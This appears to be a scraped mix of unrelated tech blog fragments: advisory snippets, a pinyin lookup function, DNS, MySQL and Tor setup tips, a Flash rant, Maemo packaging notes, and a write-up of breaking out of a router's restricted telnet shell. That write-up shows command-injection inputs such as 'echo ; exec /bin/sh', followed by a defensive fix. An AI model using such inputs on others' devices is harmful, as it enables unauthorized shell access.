Two issues have been found in the Apache HTTPD web server:
Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems:
It was discovered that in ejabberd, a distributed XMPP/Jabber server written in Erlang, a problem in ejabberd_c2s.erl allows remote authenticated users to cause a denial of service by sending a large number of c2s (client2server) messages; that triggers an overload of the queue, which in turn causes a crash of the ejabberd daemon.
Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. The Common Vulnerabilities and Exposures project identifies the following problems:
Sol Jerome discovered that the kadmind service in krb5, a system for authenticating users and services on a network, allows remote authenticated users to cause a denial of service (daemon crash) via a request from a kadmin client that sends an invalid API version number.
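def getPY(s):
    """Return the pinyin initial (a-z) of one Chinese character."""
    # Anything that cannot be encoded, or is not a hanzi, is returned unchanged.
    try:
        code = s.encode("GB18030")  # bytes; named so the builtin chr() is not shadowed
    except Exception:
        return s
    # GB2312 level-1 hanzi (0xB0A1-0xD7F9) are ordered by pinyin, so comparing
    # the encoded bytes against range boundaries yields the initial letter.
    if code < b"\xb0\xa1": return s
    if code > b"\xd7\xf9": return u"?"
    if code < b"\xb0\xc5": return u"a"
    if code < b"\xb2\xc1": return u"b"
    if code < b"\xb4\xee": return u"c"
    if code < b"\xb6\xea": return u"d"
    if code < b"\xb7\xa2": return u"e"
    if code < b"\xb8\xc1": return u"f"
    if code < b"\xb9\xfe": return u"g"
    if code < b"\xbb\xf7": return u"h"
    if code < b"\xbf\xa6": return u"j"
    if code < b"\xc0\xac": return u"k"
    if code < b"\xc2\xe8": return u"l"
    if code < b"\xc4\xc3": return u"m"
    if code < b"\xc5\xb6": return u"n"
    if code < b"\xc5\xbe": return u"o"
    if code < b"\xc6\xda": return u"p"
    if code < b"\xc8\xbb": return u"q"
    if code < b"\xc8\xf6": return u"r"
    if code < b"\xcb\xfa": return u"s"
    if code < b"\xcd\xda": return u"t"
    if code < b"\xce\xf4": return u"w"
    if code < b"\xd1\xb9": return u"x"
    if code < b"\xd4\xd1": return u"y"
    if code < b"\xd7\xfa": return u"z"
    return s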
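A so-called "Democratic Party" that does not believe in democracy announced its own doom today!!
Last week Google opened up a DNS service similar to OpenDNS. These are the IP addresses of its DNS servers: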
8.8.8.8
8.8.4.4
On Linux, to switch to Google's DNS, just edit the /etc/resolv.conf file and change the DNS servers currently in use to the following:
nameserver 8.8.8.8
nameserver 8.8.4.4
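Perhaps because Google's user base is huge, the cache in its DNS servers is also richer, so when browsing websites the resolve time often feels fast, with better response than your own ISP's. But note that when you use Google's DNS, Google can in fact also see your browsing records; anyone concerned about privacy should keep this in mind.
The following introduces some simple MySQL performance tuning tips. All of them are done through my.cnf parameters, with no need to recompile MySQL.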
Key Buffer
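The key buffer is the amount of cache space available for indexes, and it has a large effect on index handling. Size the key buffer according to your own needs; a simple approach is to use 25% of memory as the key buffer. On a dedicated database server, consider using more, for example 50%.
Setting the key buffer size can reduce the impact of disk I/O operations on MySQL.
Here is how to set the key buffer in my.cnf: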
key_buffer = 512M
Query Cache
This is the cache for SQL queries: it keeps a query's result in memory until the data is updated.
query_cache_size = 128M
query_cache_limit = 4M
Table Cache
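This matters a great deal when many tables have to be accessed at the same time; it sets the number of tables that can be open simultaneously.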
table_cache = 512
Sort Buffers
sort_buffer_size (sort_buffer in older versions) sets the cache for grouping and sorting.
sort_buffer_size = 32M
myisam_sort_buffer_size = 32M
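Step1: Get bridge addresses
Using your Gmail account, send an email whose subject and body are "get bridges" to bridges@torproject.org
Step2: Configure the Tor bridges
First, back up the original Tor configuration file torrc to a backup directory: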
sudo cp -p /etc/tor/torrc your-backup-directory
Then add the "UseBridges 1" switch option at the end of the torrc configuration file (the default is 0, i.e. off):
UseBridges 1
UpdateBridgesFromAuthority 1
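Finally, append the bridge list from the bridges@torproject.org reply email to the end of the torrc configuration file, keeping the original format of the bridges in the reply email, namely: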
bridge ip:port fingerprint
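The emails discussed in the two blog posts mentioned above have a fingerprint field; the email I received did not, but after testing I found it works just the same.
Step3: Restart Tor and Privoxy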
sudo /etc/init.d/tor restart
sudo /etc/init.d/privoxy restart
I really fricking hate Flash. Not that you needed to be told this. It kind of looks nice when it works, except when it crashes your browser. It eats your CPU time and is buggy, there's a word we use to refer to software like that, it's 4 letters, starts in an s and ends in a t.
There's another reason not to like Flash though that's got less to do with the Flash program itself but more to do with how people use it. More than ever advertisers are using Flash to display animated or interactive advertising on webpages. That's kind of nice in a way, I guess, because you can essentially build custom miniature apps in the advertising window. I do have a problem when advertising starts interfering with what I do. I mean, auto adverts with cars running across the screen? How about video adverts which pop up and play automatically (with sound!) when you load a news site, or sound-only advertising that plays in the background and has no stop button? I mean, really? Seriously, isn't that going too far? It's really distracting and really fricking annoying. I've always felt that advertising agencies have a general hate towards content consumers. I'll tell you the first thing I do when I see junk running across the screen or some video ad running just in the middle of when I'm reading the news, I tell the ad to f-off by clicking the "X" button in the corner (if there's one at all). Ads, sure, but not like this, thanks.
All thanks to a fairly prominent Sydney-based newspaper which recently started doing this and pushed me over the limit, I've now got Click to Flash installed in Safari. Now, Flash does not load automatically, it only loads when you click on the Flash window. Why don't browsers come with these things by default (by the way, Safari already has a checkbox which allows you to disable Flash)? All browsers should have a "Webpage De-annoy-alizer" tab in the Preferences window that allows you to do things like this.
I had a hard time finding out which icon sizes one has to provide and
where to install them for Maemo applications (I'm currently developing
for OS2008 "chinook", might be different for other releases). Here is
what I found out by looking at the contents of other GUI packages:
26x26 icon goes to /usr/share/icons/26x26/hildon/appname.png
40x40 icon goes to /usr/share/icons/40x40/hildon/appname.png
64x64 icon goes to /usr/share/icons/scalable/hildon/appname.png
The 64x64 icon will be used in the menu, so be sure to make it really
64x64, otherwise the icon will look out of place in the menu. Also, be
sure to create an executable "postinst" file in the "debian/"
subdirectory of your package source that has at least the following
two commands:
gtk-update-icon-cache -f /usr/share/icons/hicolor
maemo-select-menu-location appname.desktop
Where of course "appname" is the name of your application and how you
named your icon and .desktop file.
The embedded routers available on the market these days are truly wonderful things. You buy one, it just works, you leave it there until there is a compelling reason to get a new one. Everybody is happy.
Oops! Just kidding! That's the way things ought to work, but it never does. Getting a router that works these days (perhaps with the exception of an Apple router, I guess) is largely a game of chance. Even doing due diligence by reading online reviews will not save you.
The particular one I have, a Dynalink RTA1046VW, which appears to be a rebadged Netcomm, does wireless and VOIP along with the usual Ethernet connection. The wireless would, however, fail every couple of days. It would just drop stone cold, and I'd have to reset it, but when I do the VOIP line would drop dead. This, gentle reader, in case you have not realized now, is very annoying. I thought the point of the wireless being there was so that you can use it?
Must be tough, writing router firmware, though I offer an alternative explanation. Maybe the hardware manufacturers of these routers simply do not give a damn about the quality of the software they stick inside these routers. A scary thought, millions of these devices powering the Intarwebs of the average Joe. Most of the time the poor quality manifests itself in things that won't work, like my wireless module. Sometimes they are a bit more egregious.
The particular router I have happens to run Linux. You don't find any mention of this or the fact that it uses GPL software, because it is not advertised as such. I am not a lawyer and do not know if you're required to acknowledge the fact that there's GPL software on the router, but for 10 bucks they do offer to send you a CD with source code on it.
I found out it ran Linux when I started poking around with the router, trying to find out whether there was some misconfiguration that caused the wireless to drop out every couple of days. They have the usual web interface, but when I experimented with it, it turned out they also have a telnet interface. It drops you into a custom command prompt with a set of built-in commands. That's not unusual in itself, but the output was.
> ps
PID Uid VmSize Stat Command
1 admin 316 S init
2 admin SW< [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
17 admin SW [pdflush]
18 admin SW [pdflush]
19 admin SW [kswapd0]
20 admin SW< [aio/0]
[etc]
>
Say, what? Busybox, is that you? Anyway, more on the ps output later. There's a surprising whole load of things that you can do even when you are in the crappy customized shell. For example, you can find out what kernel version it is running.
> cat /proc/version
Linux version 2.6.8.1 ( Compiled by michaelc) (gcc version 3.4.2) #1 Tue Apr 14 15:25:39 CST 2009
>
Linux 2.6.8.1 was released in 2004. I got this router in 2009. Dear firmware developer, what have you been doing for the last couple of years?
Back to the ps output. What makes the ps output particularly interesting is not the output format per se but what it shows:
1126 admin 2404 S rvsip
1127 admin 2404 S rvsip
1128 admin 2404 S rvsip
1216 admin 988 S telnetd
1227 admin 312 S sh -c ps
1228 admin 332 R ps
It looks like they are using system(), which invokes sh -c, to call the ps command. With that in mind, I can do this:
1128 admin 2404 S rvsip
1216 admin 988 S telnetd
1229 admin 324 S sh -c ps `cat /proc/version`
1232 admin 332 R ps Linux version 2.6.8.1 ( Compiled by michaelc) (gcc
See? I just got the shell to run another command for me outside of the customized shell. That's not so interesting, but you can do useful things based on this. For example, the customized shell does not come with a ls command, but it does come with an echo command. So I can do this:
> echo /bin/*
/bin/adsl /bin/adslctl /bin/atm /bin/atmctl /bin/autoprovisionlan /bin/brctl /bin/busybox /bin/cat /bin/cfesetup /bin/cfm /bin/chmod /bin/date /bin/ddnsd /bin/df /bin/dhcpc /bin/dhcpd /bin/dhcpr /bin/dmesg /bin/dproxy /bin/dumpmem /bin/ebtables /bin/echo /bin/epi_ttcp /bin/ethctl /bin/false /bin/hotplug /bin/ifstat /bin/igmp /bin/ip /bin/iptables /bin/kill /bin/ln /bin/mkdir /bin/mount /bin/mpd /bin/msh /bin/nas /bin/nas4not /bin/netctl /bin/nstat /bin/ping /bin/pppd /bin/ps /bin/pvc2684ctl /bin/pvc2684d /bin/pwd /bin/rm /bin/rtacct /bin/rtstat /bin/rvsip /bin/sendarp /bin/setmem /bin/sh /bin/sntp /bin/ss /bin/sysinfo /bin/tc /bin/tftpd /bin/true /bin/udhcpd /bin/upnp /bin/voicectl /bin/wl /bin/wlctl
>
OK, this is really annoying. I want a shell.
> echo `/bin/sh`
(no output)
That was disappointing. However, from the output listed earlier we know sh -c is used to invoke busybox commands from the custom shell. The -c argument takes a line of arbitrary shell commands; all you have to do is separate them with a semicolon! So, in theory, I should be able to run the /bin/sh command (or any arbitrary command) if I tacked on the command I wanted to run at the end.
> echo; exec /bin/sh
echo; exec /bin/sh: not found
>
OK, that didn't work. But what if I separated the echo command and the semi-colon with a space?
> echo ; exec /bin/sh
BusyBox v1.00 (2009.04.14-07:30+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
#
Aha! Success!
# help
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat chmod
date df dmesg echo expr false ifconfig init insmod kill klogd
linuxrc ln logger logread mkdir mount msh ping ps pwd reboot
rm rmmod route sendarp sh sysinfo syslogd test tftp tftpd top
true tty vconfig
#
Next time, do yourself a favor and get a piece of hardware on which you can install custom software, it may require a bit more initial setup but is more likely to work and will almost not be shoddily cobbled together like mine.
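The escape above works because the restricted CLI hands the whole input line to sh -c once the first word matches a built-in. The following is an added example, not code from the original post or from the router's firmware, of a dispatcher that closes that hole by executing an allowlisted binary directly with no shell in between. The command table and the function names are hypothetical.

```c
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical command table (not the router's real one): name -> fixed path. */
static const struct { const char *name, *path; } CMDS[] = {
    { "echo", "/bin/echo" }, { "ps", "/bin/ps" }, { "cat", "/bin/cat" },
};

static const char *lookup(const char *name)
{
    for (size_t i = 0; i < sizeof CMDS / sizeof CMDS[0]; i++)
        if (strcmp(CMDS[i].name, name) == 0)
            return CMDS[i].path;
    return NULL;
}

/* Split in place on whitespace; -1 if empty, too long, or not in the table. */
int parse_line(char *line, char *argv[], int max)
{
    int argc = 0;
    for (char *t = strtok(line, " \t\r\n"); t; t = strtok(NULL, " \t\r\n")) {
        if (argc == max - 1)
            return -1;
        argv[argc++] = t;
    }
    argv[argc] = NULL;
    return (argc > 0 && lookup(argv[0])) ? argc : -1;
}

/* system(line) would give the line to sh -c. Here the binary is exec'd
 * directly, so ';' and backticks stay plain argv bytes. Returns exit status. */
int run_line(const char *input)
{
    char buf[256], *argv[16];
    int status;
    if (strlen(input) >= sizeof buf ||
        parse_line(strcpy(buf, input), argv, 16) < 0)
        return -1;
    pid_t pid = fork();
    if (pid == 0) {
        execv(lookup(argv[0]), argv);
        _exit(127);
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this design the line `echo ; exec /bin/sh` just prints `; exec /bin/sh`, because the semicolon reaches /bin/echo as an ordinary argument. The cost is that shell features such as the `/bin/*` glob no longer expand.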